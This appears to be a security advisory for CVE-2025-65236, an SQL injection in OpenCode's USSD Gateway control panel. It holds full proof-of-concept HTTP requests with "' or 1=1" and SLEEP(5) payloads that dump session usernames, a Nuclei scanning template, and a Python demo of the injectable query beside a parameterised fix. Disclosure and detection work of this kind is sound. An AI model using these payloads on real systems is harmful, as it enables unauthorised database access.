[CVE-2025-65236] USSD Gateway SQL Injection - Sessions
Technical information about CVE-2025-65236 in the OpenCode USSD GW application.
Description
SQL Injection in the USSD Gateway application offered by OpenCode Systems allows a user who has access to the vulnerable function to dump the database by injecting SQL commands.
Application Details
Name: USSD Gateway
Vendor: OpenCode Systems
Version: OC Release 5 - Version 6.13.11
Technical Details
Vulnerable Endpoint:
/occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_t
Vulnerable Parameters:
flt_sessid and flt_user
Payload Sample:
flt_sessid=1; SELECT SLEEP(5)#
Exploitation
The default request retrieves the username of the account details based on the account ID; the response is shown below.
POST /occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_t HTTP/2
Host: hostname
Cookie: openid-state=c2b[...]Ic%22%3B%7D; OCPANEL-SESSIONID=1h[...]v6o; _csrf=a1[...]nAyIBz%22%3B%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
[...]
_csrf=K6[...]iB0qQ%3D%3D&display=1&=00000002&=&flt_server_node=VSSTEST01AOCFRV

HTTP/2 200 OK
[...]
[...]
<td align=left>00000002</td><td align=center>[...]</td><td align=center>[...]</td><td align=center>USERNAME</td><td align=center>0</td><td align=center>127.0.0.1</td></tr>
</TD>
</TR>
</TABLE>
[...]

By appending the payload to the parameter, all usernames are returned in the response.
Different payloads can be used; the one below was used as a PoC.
POST /occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_t HTTP/2
Host: hostname
Cookie: openid-state=c2b[...]Ic%22%3B%7D; OCPANEL-SESSIONID=1h[...]v6o; _csrf=a1[...]nAyIBz%22%3B%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
[...]
_csrf=K6[...]iB0qQ&display=1&flt_sessid=00000002'+or+1=1--+-&flt_user=&flt_server_node=VSSTEST01AOCFRV

HTTP/2 200 OK
[...]
<td align=left>00000002</td><td align=center>[...]</td><td align=center>[...]</td><td align=center>USERNAME</td><td align=center>0</td><td align=center>127.0.0.1</td></tr>
<td align=left>00000003</td><td align=center>[...]</td><td align=center>[...]</td><td align=center>USERNAME</td><td align=center>0</td><td align=center>127.0.0.1</td></tr>
<td align=left>00000004</td><td align=center>[...]</td><td align=center>[...]</td><td align=center>USERNAME</td><td align=center>0</td><td align=center>127.0.0.1</td></tr>
<td align=left>00000005</td><td align=center>[...]</td><td align=center>[...]</td><td align=center>USERNAME</td><td align=center>0</td><td align=center>127.0.0.1</td></tr>
<td align=left>00000006</td><td align=center>[...]</td><td align=center>[...]</td><td align=center>USERNAME</td><td align=center>0</td><td align=center>127.0.0.1</td></tr>
[...]
</TD>
</TR>
</TABLE>
[...]

Nuclei Template
You can use this template for easy detection.
Adjust the CSRF token if required.
id: ocussdgw-list_sessions-sqli-time

info:
  name: USSD Gateway OCP Control Panel SQL Injection
  author: Eslam Ali Akl @eslam3kl
  severity: high
  description: |
    Time-based SQL injection test for the list_sessions_t endpoint.
    Injects a SLEEP(5) payload into the `flt_sessid` and `flt_user` parameters and flags the
    target if the response time indicates the SQL sleep was executed.
    Adjust `_csrf`, cookies or headers if authentication is required.
  tags: [sqli, time-based, ocpanel, ocussdgw]

requests:
  - id: time_inject_flt_sessid
    method: POST
    path:
      - "{{BaseURL}}/occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_t"
    headers:
      Content-Type: "application/x-www-form-urlencoded; charset=UTF-8"
      X-Requested-With: "XMLHttpRequest"
      User-Agent: "nuclei-scan"
    body: "_csrf=K6[...]iB0qQ%3D%3D&display=1&flt_sessid=00000002'; SELECT SLEEP(5)#&flt_user=&flt_server_node=VSSTEST01AOCFRV"
    matchers:
      - type: dsl
        dsl:
          - "duration >= 4"

  - id: time_inject_flt_user
    method: POST
    path:
      - "{{BaseURL}}/occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_t"
    headers:
      Content-Type: "application/x-www-form-urlencoded; charset=UTF-8"
      X-Requested-With: "XMLHttpRequest"
      User-Agent: "nuclei-scan"
    body: "_csrf=K6[...]iB0qQ%3D%3D&display=1&flt_sessid=00000002&flt_user=admin'; SELECT SLEEP(5)#&flt_server_node=VSSTEST01AOCFRV"
    matchers:
      - type: dsl
        dsl:
          - "duration >= 4"
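To make the root cause of the behaviour shown in the Exploitation section concrete, here is an added Python example (not OpenCode's code; the advisory does not show the server side) that reconstructs the flawed pattern, filter values pasted into the SQL text, beside a parameterised version of the same session lookup, run against a constructed in-memory SQLite table. The table schema, the column names and the LIKE filter on `flt_user` are assumptions; the `flt_sessid` value is the advisory's own PoC payload, URL-decoded.

```python
import sqlite3

# Constructed sample data (not from the advisory): session IDs mirror the
# ones visible in the PoC response, usernames and IPs are made up.
SESSIONS = [
    ("00000002", "alice", "127.0.0.1"),
    ("00000003", "bob", "127.0.0.1"),
    ("00000004", "carol", "10.0.0.5"),
    ("00000005", "dave", "10.0.0.6"),
    ("00000006", "erin", "192.168.1.9"),
]

# The advisory's PoC value for flt_sessid after form decoding ('+' is a space).
POC_SESSID = "00000002' or 1=1-- -"


def make_db():
    """In-memory SQLite table standing in for the gateway's session store (assumed schema)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE sessions (sessid TEXT, username TEXT, client_ip TEXT)")
    con.executemany("INSERT INTO sessions VALUES (?, ?, ?)", SESSIONS)
    return con


def list_sessions_vulnerable(con, flt_sessid, flt_user):
    """Hypothetical reconstruction of the flaw: filter values become part of the SQL text,
    so a quote in flt_sessid closes the literal and the rest is parsed as SQL."""
    sql = (
        "SELECT sessid, username, client_ip FROM sessions "
        f"WHERE sessid = '{flt_sessid}' AND username LIKE '{flt_user}%'"
    )
    return con.execute(sql).fetchall()


def list_sessions_fixed(con, flt_sessid, flt_user):
    """Same lookup with bound parameters: the payload is compared as a plain string."""
    sql = "SELECT sessid, username, client_ip FROM sessions WHERE sessid = ? AND username LIKE ?"
    return con.execute(sql, (flt_sessid, flt_user + "%")).fetchall()


def demo():
    con = make_db()
    return {
        "normal_vuln": list_sessions_vulnerable(con, "00000002", ""),  # one row
        "poc_vuln": list_sessions_vulnerable(con, POC_SESSID, ""),     # every row leaks
        "poc_fixed": list_sessions_fixed(con, POC_SESSID, ""),         # no row matches
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, len(rows), "row(s)")
```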